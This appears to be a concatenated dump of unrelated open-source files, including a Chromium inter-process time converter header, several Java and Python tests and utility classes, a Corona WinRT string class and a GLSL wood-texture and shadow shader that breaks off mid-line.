// Copyright (c) 2011 The Chromium Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be // found in the LICENSE file. #ifndef THIRD_PARTY_BLINK_PUBLIC_COMMON_LOADER_INTER_PROCESS_TIME_TICKS_CONVERTER_H_ #define THIRD_PARTY_BLINK_PUBLIC_COMMON_LOADER_INTER_PROCESS_TIME_TICKS_CONVERTER_H_ #include <stdint.h> #include "base/time/time.h" #include "third_party/blink/public/common/common_export.h" namespace blink { // SiteSpecificTimeDelta<T> is base::TimeDelta with a type tag. It it // essentially base::TimeDelta, but SiteSpecificTimeDelta<T> is different from // SiteSpecificTimeDelta<U> if T is different from U. template <typename T> class SiteSpecificTimeDelta final { public: SiteSpecificTimeDelta() = default; static SiteSpecificTimeDelta<T> FromTimeDelta(base::TimeDelta delta) { return SiteSpecificTimeDelta<T>(delta); } static SiteSpecificTimeDelta<T> FromMicroseconds(int64_t usec) { return SiteSpecificTimeDelta<T>(base::TimeDelta::FromMicroseconds(usec)); } base::TimeDelta ToTimeDelta() const { return delta_; } bool operator==(const SiteSpecificTimeDelta<T> rhs) const { return delta_ == rhs.delta_; } bool operator<(const SiteSpecificTimeDelta<T> rhs) const { return delta_ < rhs.delta_; } bool operator<=(const SiteSpecificTimeDelta<T> rhs) const { return delta_ <= rhs.delta_; } private: explicit SiteSpecificTimeDelta(base::TimeDelta delta) : delta_(delta) {} base::TimeDelta delta_; }; // For logging use only. template <typename T> std::ostream& operator<<(std::ostream& os, SiteSpecificTimeDelta<T> delta) { return os << delta.ToTimeDelta(); } // SiteSpecificTimeTicks<T> is base::TimeTicks with a type tag. It is // essentially base::TimeTicks, but SiteSpecificTimeTicks<T> is different from // SiteSpecificTimeTicks<U> if T is different from U. template <typename T> class SiteSpecificTimeTicks final { public: SiteSpecificTimeTicks() = default; static SiteSpecificTimeTicks<T> FromTimeTicks(base::TimeTicks time_ticks) { return SiteSpecificTimeTicks<T>(time_ticks); } base::TimeTicks ToTimeTicks() const { return time_ticks_; } bool is_null() const { return time_ticks_.is_null(); } SiteSpecificTimeTicks<T> operator+(SiteSpecificTimeDelta<T> delta) const { return SiteSpecificTimeTicks<T>(time_ticks_ + delta.ToTimeDelta()); } SiteSpecificTimeDelta<T> operator-(SiteSpecificTimeTicks<T> rhs) const { return SiteSpecificTimeDelta<T>::FromTimeDelta(time_ticks_ - rhs.time_ticks_); } bool operator<(const SiteSpecificTimeTicks<T> rhs) const { return time_ticks_ < rhs.time_ticks_; } bool operator==(const SiteSpecificTimeTicks<T> rhs) const { return time_ticks_ == rhs.time_ticks_; } bool operator<=(const SiteSpecificTimeTicks<T> rhs) const { return time_ticks_ <= rhs.time_ticks_; } private: explicit SiteSpecificTimeTicks(base::TimeTicks time_ticks) : time_ticks_(time_ticks) {} base::TimeTicks time_ticks_; }; // For logging use only. template <typename T> std::ostream& operator<<(std::ostream& os, SiteSpecificTimeTicks<T> time_ticks) { return os << time_ticks.ToTimeTicks(); } class SiteSpecificTimeLocalTag; using LocalTimeTicks = SiteSpecificTimeTicks<SiteSpecificTimeLocalTag>; using LocalTimeDelta = SiteSpecificTimeDelta<SiteSpecificTimeLocalTag>; class SiteSpecificTimeRemoteTag; using RemoteTimeTicks = SiteSpecificTimeTicks<SiteSpecificTimeRemoteTag>; using RemoteTimeDelta = SiteSpecificTimeDelta<SiteSpecificTimeRemoteTag>; // On Windows, TimeTicks are not always consistent between processes as // indicated by |TimeTicks::IsConsistentAcrossProcesses()|. Often, the values on // one process have a static offset relative to another. Occasionally, these // offsets shift while running. // // To combat this, any TimeTicks values sent from the remote process to the // local process must be tweaked in order to appear monotonic. // // In order to properly tweak ticks, we need 4 reference points: // // - |local_lower_bound|: A known point, recorded on the local process, that // occurs before any remote values that will be // converted. // - |remote_lower_bound|: The equivalent point on the remote process. This // should be recorded immediately after // |local_lower_bound|. // - |local_upper_bound|: A known point, recorded on the local process, that // occurs after any remote values that will be // converted. // - |remote_upper_bound|: The equivalent point on the remote process. This // should be recorded immediately before // |local_upper_bound|. // // Once these bounds are determined, values within the remote process's range // can be converted to the local process's range. The values are converted as // follows: // // 1. If the remote's range exceeds the local's range, it is scaled to fit. // Any values converted will have the same scale factor applied. // // 2. The remote's range is shifted so that it is centered within the // local's range. Any values converted will be shifted the same amount. class BLINK_COMMON_EXPORT InterProcessTimeTicksConverter { public: InterProcessTimeTicksConverter(LocalTimeTicks local_lower_bound, LocalTimeTicks local_upper_bound, RemoteTimeTicks remote_lower_bound, RemoteTimeTicks remote_upper_bound); // Returns the value within the local's bounds that correlates to // |remote_ms|. LocalTimeTicks ToLocalTimeTicks(RemoteTimeTicks remote_ms) const; // Returns the equivalent delta after applying remote-to-local scaling to // |remote_delta|. LocalTimeDelta ToLocalTimeDelta(RemoteTimeDelta remote_delta) const; // Returns the (remote time) - (local time) difference estimated by the // converter. This is the constant that is subtracted from remote TimeTicks to // get local TimeTicks when no scaling is applied. base::TimeDelta GetSkewForMetrics() const; private: // The local time which |remote_lower_bound_| is mapped to. LocalTimeTicks local_base_time_; LocalTimeDelta local_range_; double range_conversion_rate_; RemoteTimeTicks remote_lower_bound_; RemoteTimeTicks remote_upper_bound_; }; } // namespace blink #endif // THIRD_PARTY_BLINK_PUBLIC_COMMON_LOADER_INTER_PROCESS_TIME_TICKS_CONVERTER_H_
2,310
310
// Copyright (C) 2002-2011 <NAME> // This file is part of the "Irrlicht Engine". // For conditions of distribution and use, see copyright notice in irrlicht.h #ifndef __C_IRR_DEVICE_CONSOLE_H_INCLUDED__ #define __C_IRR_DEVICE_CONSOLE_H_INCLUDED__ #include "IrrCompileConfig.h" #ifdef _IRR_COMPILE_WITH_CONSOLE_DEVICE_ #include "CIrrDeviceStub.h" #include "IrrlichtDevice.h" #include "ICursorControl.h" namespace irr { class CIrrDeviceConsole : public CIrrDeviceStub { public: CIrrDeviceConsole(const SIrrlichtCreationParameters& param); virtual ~CIrrDeviceConsole(); virtual bool run(); virtual void yield(); virtual void sleep(u32 timeMs, bool pauseTimer = false); virtual void setWindowCaption(const wchar_t* text); virtual bool present(video::IImage* surface, void* windowId, core::rect<s32>* srcClip); virtual bool isWindowActive() const; virtual bool isWindowFocused() const; virtual bool isWindowMinimized() const; virtual void closeDevice(); virtual void setResizable(bool resize = false); virtual void minimizeWindow(); virtual void maximizeWindow(); virtual void restoreWindow(); virtual core::position2di getWindowPosition(); virtual E_DEVICE_TYPE getType() const; private: void createDriver(); video::SExposedVideoData& getExposedVideoData(); bool Focused; bool Initialized; bool Paused; bool Close; video::SExposedVideoData ExposedVideoData; }; } // end namespace irr #endif #endif
504
5,133
/* * Copyright MapStruct Authors. * * Licensed under the Apache License version 2.0, available at http://www.apache.org/licenses/LICENSE-2.0 */ package org.mapstruct.ap.test.conversion.nativetypes; import org.mapstruct.ap.testutil.IssueKey; import org.mapstruct.ap.testutil.ProcessorTest; import org.mapstruct.ap.testutil.WithClasses; import static org.assertj.core.api.Assertions.assertThat; @WithClasses({ BooleanSource.class, BooleanTarget.class, BooleanMapper.class }) public class BooleanConversionTest { @ProcessorTest public void shouldApplyBooleanConversion() { BooleanSource source = new BooleanSource(); source.setB( true ); source.setBool( true ); BooleanTarget target = BooleanMapper.INSTANCE.sourceToTarget( source ); assertThat( target ).isNotNull(); assertThat( target.getB() ).isEqualTo( Boolean.TRUE ); assertThat( target.getBool() ).isEqualTo( Boolean.TRUE ); } @ProcessorTest public void shouldApplyReverseBooleanConversion() { BooleanTarget target = new BooleanTarget(); target.setB( Boolean.TRUE ); target.setBool( Boolean.TRUE ); BooleanSource source = BooleanMapper.INSTANCE.targetToSource( target ); assertThat( source ).isNotNull(); assertThat( source.isB() ).isEqualTo( true ); assertThat( source.getBool() ).isEqualTo( true ); } @ProcessorTest @IssueKey( "229" ) public void wrapperToPrimitiveIsNullSafe() { BooleanTarget target = new BooleanTarget(); BooleanSource source = BooleanMapper.INSTANCE.targetToSource( target ); assertThat( source ).isNotNull(); } }
619
1,780
package com.twitter.inject.annotations; import java.lang.annotation.ElementType; import java.lang.annotation.Retention; import java.lang.annotation.Target; import static java.lang.annotation.RetentionPolicy.RUNTIME; @Retention(RUNTIME) @Target({ElementType.FIELD, ElementType.PARAMETER, ElementType.METHOD}) @MarkerAnnotation public @interface Thing { /** Name of the thing */ String value(); }
126
937
package cyclops.function; import com.oath.cyclops.hkt.Higher; import lombok.AllArgsConstructor; import java.util.Comparator; import static cyclops.function.Ord.Ordering.*; public interface Ord<W,T> { public enum Ordering {LESS, EQUAL, MORE} Ordering compare(Higher<W,T> first, Higher<W,T> second); public static <W,T> Ord<W,T> ord(Comparator<Higher<W,T>> comp){ return new OrdByComparotor(comp); } @AllArgsConstructor public static class OrdByComparotor<W,T> implements Ord<W,T>{ private final Comparator<Higher<W,T>> comp; @Override public Ordering compare(Higher<W, T> first, Higher<W, T> second) { int pos = comp.compare(first,second); if(pos < 0) return LESS; if(pos>0) return MORE; return EQUAL; } } }
390
3,212
/* * Licensed to the Apache Software Foundation (ASF) under one or more * contributor license agreements. See the NOTICE file distributed with * this work for additional information regarding copyright ownership. * The ASF licenses this file to You under the Apache License, Version 2.0 * (the "License"); you may not use this file except in compliance with * the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package org.apache.nifi.controller.queue; import org.apache.nifi.controller.repository.FlowFileRecord; import org.apache.nifi.controller.repository.claim.ContentClaim; import org.apache.nifi.flowfile.FlowFilePrioritizer; import java.io.Serializable; import java.util.ArrayList; import java.util.Comparator; import java.util.List; public class QueuePrioritizer implements Comparator<FlowFileRecord>, Serializable { private static final long serialVersionUID = 1L; private final transient List<FlowFilePrioritizer> prioritizers = new ArrayList<>(); public QueuePrioritizer(final List<FlowFilePrioritizer> priorities) { if (null != priorities) { prioritizers.addAll(priorities); } } @Override public int compare(final FlowFileRecord f1, final FlowFileRecord f2) { int returnVal = 0; final boolean f1Penalized = f1.isPenalized(); final boolean f2Penalized = f2.isPenalized(); if (f1Penalized && !f2Penalized) { return 1; } else if (!f1Penalized && f2Penalized) { return -1; } if (f1Penalized && f2Penalized) { if (f1.getPenaltyExpirationMillis() < f2.getPenaltyExpirationMillis()) { return -1; } else if (f1.getPenaltyExpirationMillis() > f2.getPenaltyExpirationMillis()) { return 1; } } if (!prioritizers.isEmpty()) { for (final FlowFilePrioritizer prioritizer : prioritizers) { returnVal = prioritizer.compare(f1, f2); if (returnVal != 0) { return returnVal; } } } final ContentClaim claim1 = f1.getContentClaim(); final ContentClaim claim2 = f2.getContentClaim(); // put the one without a claim first if (claim1 == null && claim2 != null) { return -1; } else if (claim1 != null && claim2 == null) { return 1; } else if (claim1 != null && claim2 != null) { final int claimComparison = claim1.compareTo(claim2); if (claimComparison != 0) { return claimComparison; } final int claimOffsetComparison = Long.compare(f1.getContentClaimOffset(), f2.getContentClaimOffset()); if (claimOffsetComparison != 0) { return claimOffsetComparison; } } return Long.compare(f1.getId(), f2.getId()); } }
1,323
6,098
import sys import os sys.path.insert(1, os.path.join("..", "..", "..")) import h2o from tests import pyunit_utils from h2o.grid.grid_search import H2OGridSearch from h2o.estimators.gbm import H2OGradientBoostingEstimator def grid_resume(): train = h2o.import_file(path=pyunit_utils.locate("smalldata/iris/iris_wheader.csv")) hyper_parameters = { "learn_rate": [0.1, 0.01, .05], "ntrees": [10, 20] } export_dir = 'hdfs:///user/jenkins/grid_export_py' gs = H2OGridSearch(H2OGradientBoostingEstimator, hyper_params=hyper_parameters) gs.train(x=list(range(4)), y=4, training_frame=train) grid_id = gs.grid_id old_grid_model_count = len(gs.model_ids) print("Baseline grid has %d models" % old_grid_model_count) saved_path = h2o.save_grid(export_dir, grid_id) h2o.remove_all() train = h2o.import_file(path=pyunit_utils.locate("smalldata/iris/iris_wheader.csv")) grid = h2o.load_grid(saved_path) assert grid is not None assert len(grid.model_ids) == old_grid_model_count grid.train(x=list(range(4)), y=4, training_frame=train) print("Newly grained grid has %d models" % len(grid.model_ids)) assert len(grid.model_ids) == old_grid_model_count if __name__ == "__main__": pyunit_utils.standalone_test(grid_resume) else: grid_resume()
565
30,023
"""Tests for the Airzone integration."""
11
1,968
<gh_stars>1000+ ////////////////////////////////////////////////////////////////////////////// // // This file is part of the Corona game engine. // For overview and more information on licensing please refer to README.md // Home page: https://github.com/coronalabs/corona // Contact: <EMAIL> // ////////////////////////////////////////////////////////////////////////////// #include "pch.h" #include "CoronaBoxedString.h" #include "CoronaBoxedBoolean.h" #include "CoronaBoxedNumber.h" extern "C" { # include "lua.h" } namespace CoronaLabs { namespace Corona { namespace WinRT { #pragma region Consructors/Destructors CoronaBoxedString::CoronaBoxedString(Platform::String^ utf16String) { fUtf16String = utf16String; fUtf8String = CoronaLabs::WinRT::Utf8String::From(utf16String); } CoronaBoxedString::CoronaBoxedString(CoronaLabs::WinRT::Utf8String^ utf8String) { if (nullptr == utf8String) { throw ref new Platform::NullReferenceException(); } fUtf8String = utf8String; fUtf16String = utf8String->ToString(); } #pragma endregion #pragma region Public Instance Methods/Properties CoronaLabs::WinRT::Utf8String^ CoronaBoxedString::ToUtf8String() { return fUtf8String; } Platform::String^ CoronaBoxedString::ToUtf16String() { return fUtf16String; } Platform::String^ CoronaBoxedString::ToString() { return fUtf16String; } bool CoronaBoxedString::Equals(CoronaLabs::WinRT::Utf8String^ value) { return fUtf8String->Equals(value); } bool CoronaBoxedString::Equals(Platform::String^ value) { return fUtf16String->Equals(value); } bool CoronaBoxedString::Equals(Platform::Object^ value) { // Not equal if null. if (nullptr == value) { return false; } // Equal if the references match. if (Platform::Object::ReferenceEquals(this, value)) { return true; } // Do a UTF-16 comparison if applicable. auto utf16String = dynamic_cast<Platform::String^>(value); if (utf16String) { return Equals(utf16String); } // Do a UTF-8 comparison if applicable. auto utf8String = dynamic_cast<CoronaLabs::WinRT::Utf8String^>(value); if (utf8String) { return Equals(utf8String); } // The given object type cannot be compared with this class. Not equal. return false; } int CoronaBoxedString::CompareTo(Platform::Object^ value) { // Return "greater" if given a null reference. if (nullptr == value) { return 1; } // This object is always greater than the other Corona boxed value types. auto coronaBoxedBoolean = dynamic_cast<CoronaBoxedBoolean^>(value); if (coronaBoxedBoolean) { return 1; } auto coronaBoxedNumber = dynamic_cast<CoronaBoxedNumber^>(value); if (coronaBoxedNumber) { return 1; } // Compare UTF-16 strings. auto coronaBoxedString = dynamic_cast<CoronaBoxedString^>(value); if (coronaBoxedString) { return Platform::String::CompareOrdinal(fUtf16String, coronaBoxedString->fUtf16String); } return Platform::String::CompareOrdinal(fUtf16String, value->ToString()); } int CoronaBoxedString::GetHashCode() { return fUtf16String->GetHashCode(); } bool CoronaBoxedString::PushToLua(int64 luaStateMemoryAddress) { // Validate argument. if (0 == luaStateMemoryAddress) { return false; } // Push this object's string to the top of the Lua stack. auto luaStatePointer = (lua_State*)luaStateMemoryAddress; lua_pushstring(luaStatePointer, fUtf8String->Data); return true; } #pragma endregion #pragma region Public Static Functions/Properties CoronaBoxedString^ CoronaBoxedString::Empty::get() { static CoronaBoxedString kEmpty(CoronaLabs::WinRT::Utf8String::Empty); return %kEmpty; } CoronaBoxedString^ CoronaBoxedString::From(Platform::String^ value) { // If the given string is empty, then return the pre-allocated empty version of this class. if (value->IsEmpty()) { return CoronaBoxedString::Empty; } // Return an object boxing the given string. return ref new CoronaBoxedString(value); } CoronaBoxedString^ CoronaBoxedString::From(CoronaLabs::WinRT::Utf8String^ value) { // If the given string is null/empty, then return the pre-allocated empty version of this class. if (!value || value->IsEmpty) { return CoronaBoxedString::Empty; } // Return an object boxing the given string. return ref new CoronaBoxedString(value); } #pragma endregion } } } // namespace CoronaLabs::Corona::WinRT
1,470
3,673
<reponame>jaeh/IncludeOS #include <os.hpp> #include <kernel.hpp> bool os::is_booted() noexcept { return kernel::is_booted(); } const char* os::arch() noexcept { return Arch::name; } os::Panic_action os::panic_action() noexcept { return kernel::panic_action(); } void os::set_panic_action(Panic_action action) noexcept { kernel::set_panic_action(action); } os::Span_mods os::modules() { auto* bootinfo_ = kernel::bootinfo(); if (bootinfo_ and bootinfo_->flags & MULTIBOOT_INFO_MODS and bootinfo_->mods_count) { Expects(bootinfo_->mods_count < std::numeric_limits<int>::max()); return os::Span_mods { reinterpret_cast<os::Module*>(bootinfo_->mods_addr), static_cast<int>(bootinfo_->mods_count) }; } return {}; }
296
2,372
uniform sampler3D ttt3D; uniform float extraNoiseScale = 1.0f; uniform float noiseScale = 0.03f; float noise(float p) { return texture3D(ttt3D, vec3(p*noiseScale*extraNoiseScale, 0.5, 0.5)).x; } float noise(float p, float q) { return texture3D(ttt3D, vec3(p*noiseScale*extraNoiseScale, q*noiseScale*extraNoiseScale, 0.5)).x; } float snoise(float p) { return noise(p)*2.0f - 1.0f; } float snoise(float p, float q) { return noise(p, q)*2.0f - 1.0f; } float boxstep(float a, float b, float x) { return (clamp(((x)-(a)) / ((b)-(a)), 0, 1)); } uniform float Ka = 1; uniform float Kd = 0.75; uniform float Ks = 0.15; uniform float roughness = 0.025; uniform vec3 specularcolor = vec3(1, 1, 1); uniform float ringscale = 0; uniform float grainscale = 0; uniform float txtscale = 1; uniform float plankspertile = 4; uniform vec3 lightwood = vec3(0.57, 0.292, 0.125); uniform vec3 darkwood = vec3(0.275, 0.15, 0.06); uniform vec3 groovecolor = vec3(.05, .04, .015); //uniform float plankwidth = .05; uniform float plankwidth = .2; uniform float groovewidth = 0.001; uniform float plankvary = 0.8; uniform float grainy = 1; uniform float wavy = 0.08; uniform float MINFILTERWIDTH = 1.0e-7; vec3 myTexture3D_0(vec3 p) { float r; float r2; float whichrow; float whichplank; float swidth; float twidth; float fwidth; float ss; float tt; float w; float h; float fade; float ttt; vec3 Ct; vec3 woodcolor; float groovy; float PGWIDTH; float PGHEIGHT; float GWF; float GHF; float tilewidth; float whichtile; float tmp; float planklength; PGWIDTH = plankwidth + groovewidth; planklength = PGWIDTH * plankspertile - groovewidth; PGHEIGHT = planklength + groovewidth; GWF = groovewidth*0.5 / PGWIDTH; GHF = groovewidth*0.5 / PGHEIGHT; // Determine how wide in s-t space one pixel projects to float s = p.x; float t = p.y; float du = 1.0; float dv = 1.0; swidth = (max(abs(dFdx(s)*du) + abs(dFdy(s)*dv), MINFILTERWIDTH) / PGWIDTH) * txtscale; twidth = (max(abs(dFdx(t)*du) + abs(dFdy(t)*dv), MINFILTERWIDTH) / PGHEIGHT) * txtscale; fwidth = max(swidth, twidth); ss = (txtscale * s) / PGWIDTH; whichrow = floor(ss); tt = (txtscale * t) / PGHEIGHT; whichplank = floor(tt); if (mod(whichrow / plankspertile + whichplank, 2) >= 1) { ss = txtscale * t / PGWIDTH; whichrow = floor(ss); tt = txtscale * s / PGHEIGHT; whichplank = floor(tt); tmp = swidth; swidth = twidth; twidth = tmp; } ss -= whichrow; tt -= whichplank; whichplank += 20 * (whichrow + 10); if (swidth >= 1) w = 1 - 2 * GWF; else w = clamp(boxstep(GWF - swidth, GWF, ss), max(1 - GWF / swidth, 0), 1) - clamp(boxstep(1 - GWF - swidth, 1 - GWF, ss), 0, 2 * GWF / swidth); if (twidth >= 1) h = 1 - 2 * GHF; else h = clamp(boxstep(GHF - twidth, GHF, tt), max(1 - GHF / twidth, 0), 1) - clamp(boxstep(1 - GHF - twidth, 1 - GHF, tt), 0, 2 * GHF / twidth); // This would be the non-antialiased version: //w = step (GWF,ss) - step(1-GWF,ss); //h = step (GHF,tt) - step(1-GHF,tt); groovy = w*h; // Add the ring patterns fade = smoothstep(1 / ringscale, 8 / ringscale, fwidth); if (fade < 0.999) { ttt = tt / 4 + whichplank / 28.38 + wavy * noise(8 * ss, tt / 4); r = ringscale * noise(ss - whichplank, ttt); r -= floor(r); r = 0.3 + 0.7*smoothstep(0.2, 0.55, r)*(1 - smoothstep(0.75, 0.8, r)); r = (1 - fade)*r + 0.65*fade; // Multiply the ring pattern by the fine grain fade = smoothstep(2 / grainscale, 8 / grainscale, fwidth); if (fade < 0.999) { r2 = 1.3 - noise(ss*grainscale, (tt*grainscale / 4)); r2 = grainy * r2*r2 + (1 - grainy); r *= (1 - fade)*r2 + (0.75*fade); } else r *= 0.75; } else r = 0.4875; // Mix the light and dark wood according to the grain pattern woodcolor = lerp(lightwood, darkwood, r); // Add plank-to-plank variation in overall color woodcolor *= (1 - plankvary / 2 + plankvary * noise(whichplank + 0.5)); Ct = lerp(groovecolor, woodcolor, groovy); return Ct; } float noise3D_1(vec3 p) { return texture3D(ttt3D, p).x*2.0f - 1.0f; } float turbulence_1(vec3 p, int octaves, float lacunarity, float gain) { float freq = 1.0f; float amp = 0.8f; float sum = 0.0f; for (int i = 0; i<octaves; i++) { sum += abs(noise3D_1(p*freq))*amp; freq *= lacunarity; amp *= gain; } return sum; } float spike_1(float c, float w, float x) { return smoothstep(c - w, c, x) * smoothstep(c + w, c, x); } vec3 myTexture3D_1(vec3 p) { float noiseScale = 0.1f*extraNoiseScale; float noise = turbulence_1(p*noiseScale, 3, 3.0f, 0.5f); //noise = turbulence(p*noiseScale + vec3(noise, noise, noise*0.3)*0.01f, 8, 3.0f, 0.5f); //noise = spike(0.35f, 0.05f, noise); //noise = noise; vec3 base = lerp(vec3(164, 148, 108)*1.63 / 255, vec3(178, 156, 126)*1.73 / 255, spike_1(0.5f, 0.3f, turbulence_1(p*noiseScale*0.7f + vec3(noise*0.5, noise, noise)*0.011f, 2, 2.0f, 0.5f))); //vec3 b2 = lerp(base, vec3(0.0f, 0.0f, 0.0f), noise); vec3 b2 = lerp(base, vec3(173, 160, 121)*1.73 / 255, noise); return b2*0.75f; } vec3 myTexture3DCom(vec3 p, float mat) { // Depend on material ID if (mat < 0.5f) { //return myTexture3D_0(p); return vec3(173, 160, 151) *0.85/ 255; //return lightwood*1.3; } else if (mat < 1.5f) { //return myTexture3D_1(p); return vec3(173, 100, 21)*1.73 / 255; } else { return vec3(1.0f, 0.0f, 0.0f); } } // scene reflection uniform float reflectionCoeff = 0.0f; uniform float specularCoeff = 0.0f; uniform sampler2DRect reflectionTex; // Shadow map uniform float shadowAmbient = 0.0; uniform float hdrScale = 5.0; uniform sampler2D texture; uniform sampler2DArrayShadow stex; uniform sampler2DArrayShadow stex2; uniform sampler2DArrayShadow stex3; uniform samplerCube skyboxTex; uniform vec2 texSize; // x - size, y - 1/size uniform vec4 far_d; // Spot lights uniform vec3 spotLightDir; uniform vec3 spotLightPos; uniform float spotLightCosineDecayBegin; uniform float spotLightCosineDecayEnd; uniform vec3 spotLightDir2; uniform vec3 spotLightPos2; uniform float spotLightCosineDecayBegin2; uniform float spotLightCosineDecayEnd2; uniform vec3 spotLightDir3; uniform vec3 spotLightPos3; uniform float spotLightCosineDecayBegin3; uniform float spotLightCosineDecayEnd3; uniform vec3 parallelLightDir; uniform float shadowAdd; uniform int useTexture; uniform int numShadows; uniform float roughnessScale; uniform vec3 ambientColor; uniform sampler2DArray diffuseTexArray; uniform sampler2DArray bumpTexArray; uniform sampler2DArray specularTexArray; uniform sampler2DArray emissiveReflectSpecPowerTexArray; uniform vec2 shadowTaps[12]; float shadowCoeff1(float bscale) { int index = 3; if(gl_FragCoord.z < far_d.x) index = 0; else if(gl_FragCoord.z < far_d.y) index = 1; else if(gl_FragCoord.z < far_d.z) index = 2; vec4 shadow_coord = gl_TextureMatrix[index]*vec4(gl_TexCoord[1].xyz, 1); shadow_coord.w = shadow_coord.z + shadowAdd*bscale; // tell glsl in which layer to do the look up shadow_coord.z = float(index); // Gaussian 3x3 filter // return shadow2DArray(stex, shadow_coord).x; /* const float X = 1.0f; float ret = shadow2DArray(stex, shadow_coord).x * 0.25; ret += shadow2DArrayOffset(stex, shadow_coord, ivec2( -X, -X)).x * 0.0625; ret += shadow2DArrayOffset(stex, shadow_coord, ivec2( -X, 0)).x * 0.125; ret += shadow2DArrayOffset(stex, shadow_coord, ivec2( -X, X)).x * 0.0625; ret += shadow2DArrayOffset(stex, shadow_coord, ivec2( 0, -X)).x * 0.125; ret += shadow2DArrayOffset(stex, shadow_coord, ivec2( 0, X)).x * 0.125; ret += shadow2DArrayOffset(stex, shadow_coord, ivec2( X, -X)).x * 0.0625; ret += shadow2DArrayOffset(stex, shadow_coord, ivec2( X, 0)).x * 0.125; ret += shadow2DArrayOffset(stex, shadow_coord, ivec2( X, X)).x * 0.0625; return ret;*/ const int numTaps = 6; float radius = 0.0003f/pow(2,index); float s = 0.0f; for (int i = 0; i < numTaps; i++) { s += shadow2DArray(stex, shadow_coord + vec4(shadowTaps[i] * radius, 0.0f, 0.0f)).r; } s /= numTaps; return s; } float shadowCoeff2() { const int index = 1; //int index = 3; //if(gl_FragCoord.z < far_d.x) // index = 0; //else if(gl_FragCoord.z < far_d.y) // index = 1; //else if(gl_FragCoord.z < far_d.z) // index = 2; vec4 shadow_coord = gl_TextureMatrix[index]*vec4(gl_TexCoord[1].xyz, 1); shadow_coord.w = shadow_coord.z + shadowAdd; shadow_coord.z = float(0); // return shadow2DArray(stex, shadow_coord).x; const float X = 1.0f; float ret = shadow2DArray(stex2, shadow_coord).x * 0.25; ret += shadow2DArrayOffset(stex2, shadow_coord, ivec2( -X, -X)).x * 0.0625; ret += shadow2DArrayOffset(stex2, shadow_coord, ivec2( -X, 0)).x * 0.125; ret += shadow2DArrayOffset(stex2, shadow_coord, ivec2( -X, X)).x * 0.0625; ret += shadow2DArrayOffset(stex2, shadow_coord, ivec2( 0, -X)).x * 0.125; ret += shadow2DArrayOffset(stex2, shadow_coord, ivec2( 0, X)).x * 0.125; ret += shadow2DArrayOffset(stex2, shadow_coord, ivec2( X, -X)).x * 0.0625; ret += shadow2DArrayOffset(stex2, shadow_coord, ivec2( X, 0)).x * 0.125; ret += shadow2DArrayOffset(stex2, shadow_coord, ivec2( X, X)).x * 0.0625; return ret; } float shadowCoeff3() { const int index = 2; //int index = 3; //if(gl_FragCoord.z < far_d.x) // index = 0; //else if(gl_FragCoord.z < far_d.y) // index = 1; //else if(gl_FragCoord.z < far_d.z) // index = 2; vec4 shadow_coord = gl_TextureMatrix[index]*vec4(gl_TexCoord[1].xyz, 1); shadow_coord.w = shadow_coord.z + shadowAdd; shadow_coord.z = float(0); // return shadow2DArray(stex, shadow_coord).x; const float X = 1.0f; float ret = shadow2DArray(stex3, shadow_coord).x * 0.25; ret += shadow2DArrayOffset(stex3, shadow_coord, ivec2( -X, -X)).x * 0.0625; ret += shadow2DArrayOffset(stex3, shadow_coord, ivec2( -X, 0)).x * 0.125; ret += shadow2DArrayOffset(stex3, shadow_coord, ivec2( -X, X)).x * 0.0625; ret += shadow2DArrayOffset(stex3, shadow_coord, ivec2( 0, -X)).x * 0.125; ret += shadow2DArrayOffset(stex3, shadow_coord, ivec2( 0, X)).x * 0.125; ret += shadow2DArrayOffset(stex3, shadow_coord, ivec2( X, -X)).x * 0.0625; ret += shadow2DArrayOffset(stex3, shadow_coord, ivec2( X, 0)).x * 0.125; ret += shadow2DArrayOffset(stex3, shadow_coord, ivec2( X, X)).x * 0.0625; return ret; } uniform float RollOff = 0.5f; uniform float fresnelBias = 0.0; uniform float fresnelScale = 1.0; uniform float fresnelPower = 3.0; // 5.0 is physically correct void main() { /* int index = 3; if(gl_FragCoord.z < far_d.x) index = 0; else if(gl_FragCoord.z < far_d.y) index = 1; else if(gl_FragCoord.z < far_d.z) index = 2; if (index == 3) gl_FragColor = vec4(1,0,0,1); if (index == 2) gl_FragColor = vec4(0,1,0,1); if (index == 1) gl_FragColor = vec4(0,0,1,1); if (index == 0) gl_FragColor = vec4(1,1,0,1); return;*/ /* int index = 3; if(gl_FragCoord.z < far_d.x) index = 0; else if(gl_FragCoord.z < far_d.y) index = 1; else if(gl_FragCoord.z < far_d.z) index = 2; vec4 shadow_coord = gl_TextureMatrix[index]*vec4(gl_TexCoord[1].xyz, 1); shadow_coord.w = shadow_coord.z + shadowAdd; // tell glsl in which layer to do the look up shadow_coord.z = float(index)*0.33333333f; gl_FragColor = vec4(shadow_coord.xyz,1.0f); return; */ //// TODO, expose this as user parameter const float skyLightIntensity = 0.2; const float rimLightIntensity = 0.3; vec3 normal = normalize(gl_TexCoord[2].xyz); vec3 t0 = gl_TexCoord[3].xyz; vec3 t1 = gl_TexCoord[4].xyz; vec3 diffuseMat; vec3 specularMat; vec3 bump; vec3 emissiveReflectSpecPow; // read in material color for diffuse, specular, bump, emmisive // 3D texture diffuseMat = myTexture3DCom(gl_TexCoord[0].xyz, gl_TexCoord[6].w); //diffuseMat = myTexture3D(gl_TexCoord[0].xyz);//texture3D(ttt3D, gl_TexCoord[0].xyz); //diffuseMat = texture3D(ttt3D, gl_TexCoord[0].xyz); specularMat = vec3(1.0); bump = texture2D(texture, gl_TexCoord[5].xy).xyz; if (dot(bump,bump) < 0.01) bump = vec3(0.5,0.5,1); emissiveReflectSpecPow = vec3(0.0,0.0,0.0); // apply bump to the normal bump = (bump - vec3(0.5,0.5,0.5)) * 2.0f; bump.xy *= roughnessScale*0.1; float sc = 1.0f; normal = normalize(t0*bump.x + t1*bump.y + sc*normal * bump.z); //gl_FragColor.xyz = normal*0.5 + vec3(0.5,0.5,0.5); //gl_FragColor.w = 1; //return; vec3 eyeVec = normalize(gl_TexCoord[1].xyz); // apply gamma correction for diffuse textures //diffuseMat = pow(diffuseMat, 0.45); float specularPower = emissiveReflectSpecPow.b*255.0f + 1.0f; // TODO - fix this specularPower = 10.0f; float emissive = 0.0f; float reflectivity = emissiveReflectSpecPow.b; float fresnel = fresnelBias + fresnelScale*pow(1.0 - max(0.0, dot(normal, eyeVec)), 